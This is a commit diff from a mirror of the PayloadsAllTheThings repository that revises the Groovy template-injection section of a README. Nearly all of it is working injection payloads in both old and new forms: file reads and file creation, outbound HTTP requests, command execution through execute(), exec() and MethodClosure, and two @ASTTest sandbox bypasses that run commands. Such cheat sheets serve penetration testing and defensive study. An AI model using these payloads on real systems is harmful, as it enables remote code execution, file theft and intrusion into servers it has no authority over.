mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-23 21:05:27 +00:00
Update README.md
This commit is contained in:
parent
7d290ded54
commit
59cae2ddb4
@ -194,48 +194,45 @@ ${dwf.newInstance(ec,null)("id")}
|
|||||||
|
|
||||||
[Official website](https://groovy-lang.org/)
|
[Official website](https://groovy-lang.org/)
|
||||||
|
|
||||||
|
|
||||||
### Groovy - Basic injection
|
### Groovy - Basic injection
|
||||||
|
|
||||||
Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection.
|
Refer to https://groovy-lang.org/syntax.html , but `${9*9}` is the basic injection.
|
||||||
|
|
||||||
|
|
||||||
### Groovy - Read and create File
|
### Groovy - Read and create File
|
||||||
|
|
||||||
```groovy
|
```groovy
|
||||||
String x = new File('c:/windows/notepad.exe').text
|
${String x = new File('c:/windows/notepad.exe').text}
|
||||||
String x = new File('/path/to/file').getText('UTF-8')
|
${String x = new File('/path/to/file').getText('UTF-8')}
|
||||||
new File("C:\Temp\FileName.txt").createNewFile();
|
${new File("C:\Temp\FileName.txt").createNewFile();}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Groovy - HTTP request:
|
### Groovy - HTTP request:
|
||||||
|
|
||||||
|
|
||||||
```groovy
|
```groovy
|
||||||
"http://www.google.com".toURL().text
|
${"http://www.google.com".toURL().text}
|
||||||
new URL("http://www.google.com").getText()
|
${new URL("http://www.google.com").getText()}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Groovy - Command Execution
|
### Groovy - Command Execution
|
||||||
|
|
||||||
```groovy
|
```groovy
|
||||||
"calc.exe".exec()
|
${"calc.exe".exec()}
|
||||||
"calc.exe".execute()
|
${"calc.exe".execute()}
|
||||||
this.evaluate("9*9") //(this is a Script)
|
${this.evaluate("9*9") //(this is a Script class)}
|
||||||
new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()
|
${new org.codehaus.groovy.runtime.MethodClosure("calc.exe","execute").call()}
|
||||||
```
|
```
|
||||||
|
|
||||||
### Groovy - Sandbox Bypass
|
### Groovy - Sandbox Bypass
|
||||||
|
|
||||||
```groovy
|
```groovy
|
||||||
@ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
|
${ @ASTTest(value={assert java.lang.Runtime.getRuntime().exec("whoami")})
|
||||||
def x
|
def x }
|
||||||
```
|
```
|
||||||
|
|
||||||
or
|
or
|
||||||
|
|
||||||
```groovy
|
```groovy
|
||||||
new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x")
|
${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(value={assert java.lang.Runtime.getRuntime().exec(\"calc.exe\")})def x") }
|
||||||
```
|
```
|
||||||
|
|
||||||
---
|
---
|
||||||
|
Loading…
Reference in New Issue
Block a user